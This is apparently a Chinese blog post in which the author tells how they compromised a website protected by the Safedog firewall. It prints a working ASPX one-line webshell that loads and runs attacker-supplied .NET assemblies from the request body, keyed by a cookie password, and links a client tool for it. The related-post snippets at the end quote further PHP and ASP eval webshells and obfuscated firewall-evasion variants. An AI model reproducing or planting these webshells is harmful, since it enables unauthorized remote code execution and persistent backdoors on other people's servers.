可突破安全狗的aspx一句话

最新推荐文章于 2024-05-17 09:14:42 发布
最新推荐文章于 2024-05-17 09:14:42 发布
阅读量1.1k 收藏
点赞数
分类专栏: webshell 文章标签: null object 服务器 shell iis c#

在看一个站的时候,发现服务器装了安全狗,刚开始利用IIS6的畸形解析一直被拦截,最后找到了不用畸形解析的办法,传了菜刀的一句话,却连不上,一直返回403,应该是被拦截,后来找了个相对比较生僻的一句话,终于上传并连接成功。

服务端一句话木马:

<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
客户端截图:

 

我的网盘:ASPX一句话shell客户端.rar

fengling132
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
无限免杀D盾脚本之aspx ——yzddMr6
yzddMr6的博客
11-19 3500
前言 自己曾经写过一篇文章:利用随机异或无限免杀某盾 php的webshell免杀方法有很多,但是市面上很少有讲aspx免杀的文章. 因为aspx的权限一般较大,对于渗透过程中还是很重要的, 所以就想着写一篇文章来简单的介绍下aspx的免杀 0x01 主要方法 字符串拼接 函数 数组 Base64编码 0x02 了解aspx一句 Aspx的一句一般是使用Jscript语言实...
webshell免杀小工具
wo41ge的博客
12-25 553
ASP绕过 相比于php ,asp就很不灵活了,许多编码函数不自带,注释无法隔断函数关键字与括号。 但是依然有不少方法可以绕过 首先asp的一句木马如下: <%execute(request("x"))%> 使用函数分割关键字 <% Function b(): b = request("x") End Function Function a(): eXecUTe(b()) End Function a() %> 连接密码:x 批量脚本 import r
安全狗aspx一句webshell
02-08
安全狗aspx一句webshell 纯CS模式,经典免杀
Python shellcode免杀无文件落地_文件不落地免杀(1)
最新发布
2401_84969865的博客
05-17 325
【代码】Python shellcode免杀无文件落地_文件不落地免杀(1)
ASPX版菜刀一句,留后门专用
weixin_34377919的博客
10-19 1144
首先解释一下为什么要做这个玩意:众所周知.net一句是不能插入到文件之中的,除非那个页面使用Jscript编写,但是现在看来 Jscript市场很低,遇到的.net站基本都是C#。新建一个SHELL太过于明显,而且其中的eval更是在WEBSHELL扫描工具的淫威下直接 出局。如果不能提权的,那么过一段时间再打开往往面临的是大大的404。综上,利用.net会加载bin目录中的类库的特点和命...
shell 免杀aspx_避开eval关键字,打造免杀一句木马
weixin_30304773的博客
01-16 1933
这年头留个php一句木马,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木马的寿命,但要怎么避开呢?首先我想到的是将eval从字符串类型赋给一个变量。如:$func = 'phpinfo';$func();这样的确是可以运行phpinfo()的,但是eval却不能通过这样来执行,我马上又想到了assert函数,他有着类似eval的功能,但效果并不理想...
ASPX一句***--终极版&详细分析(ASP-EXECUTE VS ASPX-EVAL)
weixin_34366546的博客
08-09 626
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])注意:本文章首发[url]http://blog.csdn.net/kj021320/archive/2007/08/04/1726442.aspx[/url],后由原创作者kj021320友情提交到邪恶八进制信息安全团队论坛。首先回顾一下以前ASP一句的经典***吧! <...
aspx一句
02-26
aspx一句,为你提供asp,php,jsp,aspx一句
安全狗aspx一句.rar
07-23
好东西啦,完美突破安全狗垃圾防火墙 ,黑阔软件
ASPX一句shell客户端
06-16
ASPX一句shell客户端是Web应用程序安全领域中的一个关键概念,主要与网络安全和恶意攻击相关。在Web服务器上,ASPX是Microsoft .NET框架用于创建动态网页的一种编程语言,类似于PHP或JSP。当一个ASPX页面被恶意...
Aspx一句网马Webshell.rar
01-07
这个压缩包文件"Aspx一句网马Webshell.rar"很可能包含了此类恶意代码的实例,用于教学、研究或安全测试的目的。 首先,我们需要理解ASPX的背景。ASPX是微软.NET框架下的网页开发技术,用于创建动态交互式网站。它...
一句
weixin_30750335的博客
09-05 306
PHP一句:1、普通一句 <!--?php @eval($_POST['ki11']);?--> 2、防爆破一句 <!--?php substr(md5($_REQUEST['x']),28)=='6862'&&eval($_REQUEST['ki11']);?--> //菜刀地址http://192.168.64.137/x.php?...
shell 免杀aspx_绕过WebShell检测的总结之文件免杀
weixin_31124869的博客
12-31 546
WAF会维护一个规则库记录webshell常用的函数、方法、结构,当匹配上对应特征时便发出警告、直接封禁或隔离。但是安全厂商们为了提升用户体验,一般会以可用性为首要目标,其次才是安全性,这是一个硬伤也是绕过的基础由于正常业务功能的需要,WAF通常并不会全盘枪毙语言中可以执行代码的结构或函数(比如eval),而是判断敏感函数是否处于某种木马后门常用且业务功能不常用的结构中,绕过即是找出既能达到目的又...
史上最全一句木马
hackzkaq的博客
06-29 7758
目录 PHP //可执行命令一句 PHP系列 过狗一句 几个变性的php–过防火墙 过狗效果都不错: 密码-7 ASP asp 一句 ASP过安全狗一句 ASPX系列 ASPX一句的 过安全狗效果不怎么样不过我认为能支持aspx 百分之8/90支持asp aspx一句 JSP 过护卫神的abc123456789原来代码是 把标签修改替换下来 为......
免杀过狗php一句,2014最新免杀过安全狗一句aspx,asp一句,php一句
weixin_36418921的博客
03-27 527
ASP系列(密码是-7)PHP系列@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/])...
教你aspx马免杀的小技巧
黑客攻防 | .net 源代码下载 | ASP.NET开发 | ORACLE数据库开发 | JAVASCRIPT脚本下载 | java源码下载
03-05 2056
导读:   今天黑站的时候,经常用的aspx马怎么也上传不了,断定是被杀了。   BBS.bitsCN.com网管论坛   要提权就得用aspx马,怎么办呢?网上找不到免杀的马。无赖之下,只有找出马中的特征码。   BBS.bitsCN.com网管论坛   尝试了好久。终于找到了。LOOK:bitsCN#com中国网管联盟   Sub RunCMD(Src As Object, E As
ASPX史上最全一句集合
2301_80115097的博客
10-18 927
/可执行命令一句
一句木马:ASPX
weixin_42478365的博客
08-06 9959
一句木马:ASPXaspx木马收集: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%> 随日期变化的连接密码, Asp.NET服务端写法: <%@ Page Language="Jscript"%><%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Fo
shell 免杀aspx_Webshell免杀
weixin_39656513的博客
12-31 605
一句木马在渗透测试中最常用的就是一句后门(小马)和中国菜刀的配合。如果出现某种WAF防护,就寻找一个免杀的大马挂马。最常见的php一句木马这个一句木马由两部分组成,eval用来执行接收的代码。$_POST['x']来接收数值。本着这个原则,尝试改写一句木马绕过WAF。搜集了几个常用的php函数执行代码的eval、assert、preg_replace接收数据的$_POST、$_GET、$...
过狗一句汇总(包含asp+php+aspx+jsp)
01-26
过狗一句汇总,是一个用于表示利用各种网站漏洞在网站上发布恶意代码的黑客行为。这个词通常与ASP、PHP、ASPX、JSP等网站开发语言相关联。黑客们会在网站上植入恶意代码,比如恶意脚本、木马病毒等,以获取用户的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值